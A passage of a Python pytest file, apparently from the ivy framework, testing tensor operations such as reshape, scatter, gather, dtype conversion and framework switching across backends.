assert np.allclose(call(ivy.isfinite, x), res)
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.isfinite)
# reshape
@pytest.mark.parametrize(
"x_n_shp", [(1., (1, 1)), (1., 1), (1., []), ([[1.]], []), ([[0., 1.], [2., 3.]], (1, 4, 1))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_reshape(x_n_shp, dtype, tensor_fn, dev, call):
# smoke test
x, new_shape = x_n_shp
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.reshape(x, new_shape)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == ((new_shape,) if isinstance(new_shape, int) else tuple(new_shape))
# value test
assert np.allclose(call(ivy.reshape, x, new_shape), np.asarray(ivy.functional.backends.numpy.reshape(ivy.to_numpy(x), new_shape)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.reshape)
# broadcast_to
@pytest.mark.parametrize(
"x_n_shp", [([1.], (2, 1)), ([[0., 1.], [2., 3.]], (10, 2, 2))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_broadcast_to(x_n_shp, dtype, tensor_fn, dev, call):
# smoke test
x, new_shape = x_n_shp
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.broadcast_to(x, new_shape)
# type test
assert ivy.is_array(ret)
# cardinality test
assert len(ret.shape) == len(new_shape)
# value test
assert np.allclose(call(ivy.broadcast_to, x, new_shape),
np.asarray(ivy.functional.backends.numpy.broadcast_to(ivy.to_numpy(x), new_shape)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.broadcast_to)
# squeeze
@pytest.mark.parametrize(
"x_n_axis", [(1., 0), (1., -1), ([[1.]], None), ([[[0.], [1.]], [[2.], [3.]]], -1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_squeeze(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.squeeze(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
if axis is None:
expected_shape = [item for item in x.shape if item != 1]
elif x.shape == ():
expected_shape = []
else:
expected_shape = list(x.shape)
expected_shape.pop(axis)
assert ret.shape == tuple(expected_shape)
# value test
assert np.allclose(call(ivy.squeeze, x, axis), np.asarray(ivy.functional.backends.numpy.squeeze(ivy.to_numpy(x), axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.squeeze)
# zeros
@pytest.mark.parametrize(
"shape", [(), (1, 2, 3), tuple([1]*10)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zeros(shape, dtype, tensor_fn, dev, call):
# smoke test
ret = ivy.zeros(shape, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == tuple(shape)
# value test
assert np.allclose(call(ivy.zeros, shape, dtype, dev), np.asarray(ivy.functional.backends.numpy.zeros(shape, dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.zeros)
# zeros_like
@pytest.mark.parametrize(
"x", [1, [1], [[1], [2], [3]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_zeros_like(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.zeros_like(x, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.zeros_like, x, dtype, dev),
np.asarray(ivy.functional.backends.numpy.zeros_like(ivy.to_numpy(x), dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.zeros_like)
# ones
@pytest.mark.parametrize(
"shape", [(), (1, 2, 3), tuple([1]*10)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_ones(shape, dtype, tensor_fn, dev, call):
# smoke test
ret = ivy.ones(shape, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == tuple(shape)
# value test
assert np.allclose(call(ivy.ones, shape, dtype, dev), np.asarray(ivy.functional.backends.numpy.ones(shape, dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.ones)
# ones_like
@pytest.mark.parametrize(
"x", [1, [1], [[1], [2], [3]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_ones_like(x, dtype, tensor_fn, dev, call):
# smoke test
if isinstance(x, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.ones_like(x, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.ones_like, x, dtype, dev),
np.asarray(ivy.functional.backends.numpy.ones_like(ivy.to_numpy(x), dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.ones_like)
# full
@pytest.mark.parametrize(
"shape", [(), (1, 2, 3), tuple([1]*10)])
@pytest.mark.parametrize(
"fill_val", [2., -7.])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_full(shape, fill_val, dtype, tensor_fn, dev, call):
# smoke test
ret = ivy.full(shape, fill_val, dtype, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == tuple(shape)
# value test
assert np.allclose(call(ivy.full, shape, fill_val, dtype, dev),
np.asarray(ivy.functional.backends.numpy.full(shape, fill_val, dtype)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.ones)
# one_hot
@pytest.mark.parametrize(
"ind_n_depth", [([0], 1), ([0, 1, 2], 3), ([[1, 3], [0, 0], [8, 4], [7, 9]], 10)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_one_hot(ind_n_depth, dtype, tensor_fn, dev, call):
# smoke test
ind, depth = ind_n_depth
if isinstance(ind, Number) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
ind = ivy.array(ind, 'int32', dev)
ret = ivy.one_hot(ind, depth, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == ind.shape + (depth,)
# value test
assert np.allclose(call(ivy.one_hot, ind, depth, dev),
np.asarray(ivy.functional.backends.numpy.one_hot(ivy.to_numpy(ind), depth)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.one_hot)
# cross
@pytest.mark.parametrize(
"x1_n_x2", [([0., 1., 2.], [3., 4., 5.]), ([[0., 1., 2.], [2., 1., 0.]], [[3., 4., 5.], [5., 4., 3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cross(x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
x1, x2 = x1_n_x2
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = ivy.array(x1, dtype, dev)
x2 = ivy.array(x2, dtype, dev)
ret = ivy.cross(x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape
# value test
assert np.allclose(call(ivy.cross, x1, x2), np.asarray(ivy.functional.backends.numpy.cross(ivy.to_numpy(x1), ivy.to_numpy(x2))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.cross)
# matmul
@pytest.mark.parametrize(
"x1_n_x2", [([[0., 1., 2.]], [[3.], [4.], [5.]]), ([[0., 1., 2.], [2., 1., 0.]], [[3., 4.], [5., 5.], [4., 3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_matmul(x1_n_x2, dtype, tensor_fn, dev, call):
# smoke test
x1, x2 = x1_n_x2
if (isinstance(x1, Number) or isinstance(x2, Number)) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x1 = ivy.array(x1, dtype, dev)
x2 = ivy.array(x2, dtype, dev)
ret = ivy.matmul(x1, x2)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x1.shape[:-1] + (x2.shape[-1],)
# value test
assert np.allclose(call(ivy.matmul, x1, x2), np.asarray(ivy.functional.backends.numpy.matmul(ivy.to_numpy(x1), ivy.to_numpy(x2))))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.matmul)
# cumsum
@pytest.mark.parametrize(
"x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cumsum(x_n_axis, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype, dev)
ret = ivy.cumsum(x, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.cumsum, x, axis), np.asarray(ivy.functional.backends.numpy.cumsum(ivy.to_numpy(x), axis)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.cumsum)
# cumprod
@pytest.mark.parametrize(
"x_n_axis", [([[0., 1., 2.]], -1), ([[0., 1., 2.], [2., 1., 0.]], 0), ([[0., 1., 2.], [2., 1., 0.]], 1)])
@pytest.mark.parametrize(
"exclusive", [True, False])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_cumprod(x_n_axis, exclusive, dtype, tensor_fn, dev, call):
# smoke test
x, axis = x_n_axis
x = ivy.array(x, dtype, dev)
ret = ivy.cumprod(x, axis, exclusive)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == x.shape
# value test
assert np.allclose(call(ivy.cumprod, x, axis, exclusive),
np.asarray(ivy.functional.backends.numpy.cumprod(ivy.to_numpy(x), axis, exclusive)))
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.cumprod)
# identity
@pytest.mark.parametrize(
"dim_n_bs", [(3, None), (1, (2, 3)), (5, (1, 2, 3))])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_identity(dim_n_bs, dtype, tensor_fn, dev, call):
# smoke test
dim, bs = dim_n_bs
ret = ivy.identity(dim, dtype, bs, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (tuple(bs) if bs else ()) + (dim, dim)
# value test
assert np.allclose(call(ivy.identity, dim, dtype, bs, dev),
np.asarray(ivy.functional.backends.numpy.identity(dim, dtype, bs)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.identity)
# meshgrid
@pytest.mark.parametrize(
"xs", [([1, 2, 3], [4, 5, 6]), ([1, 2, 3], [4, 5, 6, 7], [8, 9])])
@pytest.mark.parametrize(
"indexing", ['xy', 'ij'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_meshgrid(xs, indexing, dtype, tensor_fn, dev, call):
# smoke test
xs_as_arrays = [ivy.array(x, 'int32', dev) for x in xs]
rets = ivy.meshgrid(*xs_as_arrays, indexing=indexing)
# type test
for ret in rets:
assert ivy.is_array(ret)
# cardinality test
target_shape = tuple([len(x) for x in xs])
if indexing == 'xy':
target_shape = (target_shape[1], target_shape[0]) + target_shape[2:]
for ret in rets:
assert ret.shape == target_shape
# value test
assert np.allclose(
call(ivy.meshgrid, *xs_as_arrays, indexing=indexing),
[np.asarray(i) for i in ivy.functional.backends.numpy.meshgrid(*[ivy.to_numpy(x) for x in xs_as_arrays], indexing=indexing)])
# compilation test
if call is helpers.torch_call:
# torch scripting can't take variable number of arguments or use keyword-only arguments with defaults
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.meshgrid)
# scatter_flat
@pytest.mark.parametrize(
"inds_n_upd_n_size", [([0, 4, 1, 2], [1, 2, 3, 4], 8), ([0, 4, 1, 2, 0], [1, 2, 3, 4, 5], 8)])
@pytest.mark.parametrize(
"red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_flat(inds_n_upd_n_size, red, dtype, tensor_fn, dev, call):
# smoke test
if (red == 'sum' or red == 'min' or red == 'max') and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
if red == 'replace' and call is not helpers.mx_call:
# mxnet is the only backend which supports the replace reduction
pytest.skip()
inds, upd, size = inds_n_upd_n_size
inds = ivy.array(inds, 'int32', dev)
upd = tensor_fn(upd, dtype, dev)
ret = ivy.scatter_flat(inds, upd, size, red, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == (size,)
if red == 'replace':
return
# value test
assert np.allclose(call(ivy.scatter_flat, inds, upd, size, red, dev),
np.asarray(ivy.functional.backends.numpy.scatter_flat(ivy.to_numpy(inds), ivy.to_numpy(upd), size, red)))
# compilation test
if call in [helpers.torch_call]:
# global torch_scatter var not supported when scripting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.scatter_flat)
# scatter_nd
@pytest.mark.parametrize(
"inds_n_upd_n_shape", [([[4], [3], [1], [7]], [9, 10, 11, 12], [8]), ([[0, 1, 2]], [1], [3, 3, 3]),
([[0], [2]], [[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]],
[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]]], [4, 4, 4])])
@pytest.mark.parametrize(
"red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_nd(inds_n_upd_n_shape, red, dtype, tensor_fn, dev, call):
# smoke test
if (red == 'sum' or red == 'min' or red == 'max') and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
if red == 'replace' and call is not helpers.mx_call:
# mxnet is the only backend which supports the replace reduction
pytest.skip()
inds, upd, shape = inds_n_upd_n_shape
inds = ivy.array(inds, 'int32', dev)
upd = tensor_fn(upd, dtype, dev)
ret = ivy.scatter_nd(inds, upd, shape, red, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == tuple(shape)
if red == 'replace':
return
# value test
assert np.allclose(call(ivy.scatter_nd, inds, upd, shape, red, dev),
np.asarray(ivy.functional.backends.numpy.scatter_nd(ivy.to_numpy(inds), ivy.to_numpy(upd), shape, red)))
# compilation test
if call in [helpers.torch_call]:
# global torch_scatter var not supported when scripting
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.scatter_nd)
# gather
@pytest.mark.parametrize(
"prms_n_inds_n_axis", [([9, 8, 7, 6, 5, 4, 3, 2, 1, 0], [0, 4, 7], 0),
([[1, 2], [3, 4]], [[0, 0], [1, 0]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_gather(prms_n_inds_n_axis, dtype, tensor_fn, dev, call):
# smoke test
prms, inds, axis = prms_n_inds_n_axis
prms = tensor_fn(prms, dtype, dev)
inds = ivy.array(inds, 'int32', dev)
ret = ivy.gather(prms, inds, axis, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == inds.shape
# value test
assert np.allclose(call(ivy.gather, prms, inds, axis, dev),
np.asarray(ivy.functional.backends.numpy.gather(ivy.to_numpy(prms), ivy.to_numpy(inds), axis)))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.gather)
# gather_nd
@pytest.mark.parametrize(
"prms_n_inds", [([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[0, 1], [1, 0]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1]], [[1, 0]]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1, 0]], [[1, 0, 1]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_gather_nd(prms_n_inds, dtype, tensor_fn, dev, call):
# smoke test
prms, inds = prms_n_inds
prms = tensor_fn(prms, dtype, dev)
inds = ivy.array(inds, 'int32', dev)
ret = ivy.gather_nd(prms, inds, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == inds.shape[:-1] + prms.shape[inds.shape[-1]:]
# value test
assert np.allclose(call(ivy.gather_nd, prms, inds, dev),
np.asarray(ivy.functional.backends.numpy.gather_nd(ivy.to_numpy(prms), ivy.to_numpy(inds))))
# compilation test
if call in [helpers.torch_call]:
# pytorch scripting cannot assign a torch.device value with a string
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.gather_nd)
# linear_resample
@pytest.mark.parametrize(
"x_n_samples_n_axis_n_y_true", [([[10., 9., 8.]], 9, -1, [[10., 9.75, 9.5, 9.25, 9., 8.75, 8.5, 8.25, 8.]]),
([[[10., 9.], [8., 7.]]], 5, -2,
[[[10., 9.], [9.5, 8.5], [9., 8.], [8.5, 7.5], [8., 7.]]]),
([[[10., 9.], [8., 7.]]], 5, -1,
[[[10., 9.75, 9.5, 9.25, 9.], [8., 7.75, 7.5, 7.25, 7.]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_linear_resample(x_n_samples_n_axis_n_y_true, dtype, tensor_fn, dev, call):
# smoke test
x, samples, axis, y_true = x_n_samples_n_axis_n_y_true
x = tensor_fn(x, dtype, dev)
ret = ivy.linear_resample(x, samples, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = list(x.shape)
num_x_dims = len(x_shape)
axis = axis % num_x_dims
x_pre_shape = x_shape[0:axis]
num_vals = x.shape[axis]
x_post_shape = x_shape[axis+1:]
assert list(ret.shape) == x_pre_shape + [samples] + x_post_shape
# value test
y_true = np.array(y_true)
y = call(ivy.linear_resample, x, samples, axis)
assert np.allclose(y, y_true)
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.linear_resample)
# exists
@pytest.mark.parametrize(
"x", [[1.], None, [[10., 9., 8.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_exists(x, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x, dtype, dev) if x is not None else None
ret = ivy.exists(x)
# type test
assert isinstance(ret, bool)
# value test
y_true = x is not None
assert ret == y_true
# compilation test
if not ivy.array_mode():
helpers.assert_compilable(ivy.exists)
# default
@pytest.mark.parametrize(
"x_n_dv", [([1.], [2.]), (None, [2.]), ([[10., 9., 8.]], [2.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_default(x_n_dv, dtype, tensor_fn, dev, call):
x, dv = x_n_dv
# smoke test
x = tensor_fn(x, dtype, dev) if x is not None else None
dv = tensor_fn(dv, dtype, dev)
ret = ivy.default(x, dv)
# type test
assert ivy.is_array(ret)
# value test
y_true = ivy.to_numpy(x if x is not None else dv)
assert np.allclose(call(ivy.default, x, dv), y_true)
# compilation test
if call is helpers.torch_call:
# try-except blocks are not jit compilable in pytorch
return
if not ivy.array_mode():
helpers.assert_compilable(ivy.default)
# dtype
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype(x, dtype, tensor_fn, dev, call):
# smoke test
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.dtype(x)
# type test
assert isinstance(ret, ivy.Dtype)
# dtype_to_str
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_to_str(x, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call is helpers.jnp_call and dtype in ['int64', 'float64']:
# jax does not support int64 or float64 arrays
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
dtype_as_str = ivy.dtype(x, as_str=True)
dtype_to_str = ivy.dtype_to_str(ivy.dtype(x))
# type test
assert isinstance(dtype_as_str, str)
assert isinstance(dtype_to_str, str)
# value test
assert dtype_to_str == dtype_as_str
# dtype_from_str
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_from_str(x, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call is helpers.jnp_call and dtype in ['int64', 'float64']:
# jax does not support int64 or float64 arrays
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
dt0 = ivy.dtype_from_str(ivy.dtype(x, as_str=True))
dt1 = ivy.dtype(x)
# value test
assert dt0 is dt1
def test_cache_fn(dev, call):
def func():
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn()
ret0_again = cached_fn()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions each use the same global dict
ret0 = ivy.cache_fn(func)()
ret0_again = ivy.cache_fn(func)()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
def test_cache_fn_with_args(dev, call):
def func(_):
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn(0)
ret0_again = cached_fn(0)
ret1 = cached_fn(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions each use the same global dict
ret0 = ivy.cache_fn(func)(0)
ret0_again = ivy.cache_fn(func)(0)
ret1 = ivy.cache_fn(func)(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
def test_framework_setting_with_threading(dev, wrapped_mode, call):
if wrapped_mode:
# ToDO: get this test passing in wrapped mode
pytest.skip()
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
def thread_fn():
ivy.set_framework('numpy')
x_ = np.array([0., 1., 2.])
for _ in range(2000):
try:
ivy.reduce_mean(x_)
except TypeError:
return False
ivy.unset_framework()
return True
# get original framework string and array
fws = ivy.current_framework_str()
x = ivy.array([0., 1., 2.])
# start numpy loop thread
thread = threading.Thread(target=thread_fn)
thread.start()
# start local original framework loop
ivy.set_framework(fws)
for _ in range(2000):
ivy.reduce_mean(x)
ivy.unset_framework()
assert not thread.join()
def test_framework_setting_with_multiprocessing(dev, call):
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
def worker_fn(out_queue):
ivy.set_framework('numpy')
x_ = np.array([0., 1., 2.])
for _ in range(1000):
try:
ivy.reduce_mean(x_)
except TypeError:
out_queue.put(False)
return
ivy.unset_framework()
out_queue.put(True)
# get original framework string and array
fws = ivy.current_framework_str()
x = ivy.array([0., 1., 2.])
# start numpy loop thread
output_queue = multiprocessing.Queue()
worker = multiprocessing.Process(target=worker_fn, args=(output_queue,))
worker.start()
# start local original framework loop
ivy.set_framework(fws)
for _ in range(1000):
ivy.reduce_mean(x)
ivy.unset_framework()
worker.join()
assert output_queue.get_nowait()
def test_explicit_ivy_framework_handles(dev, call):
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
# store original framework string and unset
fw_str = ivy.current_framework_str()
ivy.unset_framework()
# set with explicit handle caught
ivy_exp = ivy.get_framework(fw_str)
assert ivy_exp.current_framework_str() == fw_str
# assert backend implemented function is accessible
assert 'array' in ivy_exp.__dict__
assert callable(ivy_exp.array)
# assert joint implemented function is also accessible
assert 'cache_fn' in ivy_exp.__dict__
assert callable(ivy_exp.cache_fn)
# set global ivy to numpy
ivy.set_framework('numpy')
# assert the explicit handle is still unchanged
assert ivy.current_framework_str() == 'numpy'
assert ivy_exp.current_framework_str() == fw_str
# unset global ivy from numpy
ivy.unset_framework()
def test_class_ivy_handles(dev, wrapped_mode, call):
if wrapped_mode:
# ToDo: get this test passing
pytest.skip()
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
class ArrayGen:
def __init__(self, ivyh):
self._ivy = ivyh
def get_array(self):
return self._ivy.array([0., 1., 2.])
# create instance
ag = ArrayGen(ivy.get_framework())
# create array from array generator
x = ag.get_array()
# verify this is not a numpy array
assert not isinstance(x, np.ndarray)
# change global framework to numpy
ivy.set_framework('numpy')
# create another array from array generator
x = ag.get_array()
# verify this is not still a numpy array
assert not isinstance(x, np.ndarray)
# einops_rearrange
@pytest.mark.parametrize(
"x_n_pattern_n_newx", [([[0., 1., 2., 3.]], 'b n -> n b', [[0.], [1.], [2.], [3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_rearrange(x_n_pattern_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, new_x = x_n_pattern_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_rearrange(x, pattern)
true_ret = einops.rearrange(ivy.to_native(x), pattern)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# compilation test
if call is helpers.torch_call:
# torch jit cannot compile **args
pytest.skip()
if not ivy.array_mode():
helpers.assert_compilable(ivy.einops_rearrange)
# einops_reduce
@pytest.mark.parametrize(
"x_n_pattern_n_red_n_newx", [([[0., 1., 2., 3.]], 'b n -> b', 'mean', [1.5])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_reduce(x_n_pattern_n_red_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, reduction, new_x = x_n_pattern_n_red_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_reduce(x, pattern, reduction)
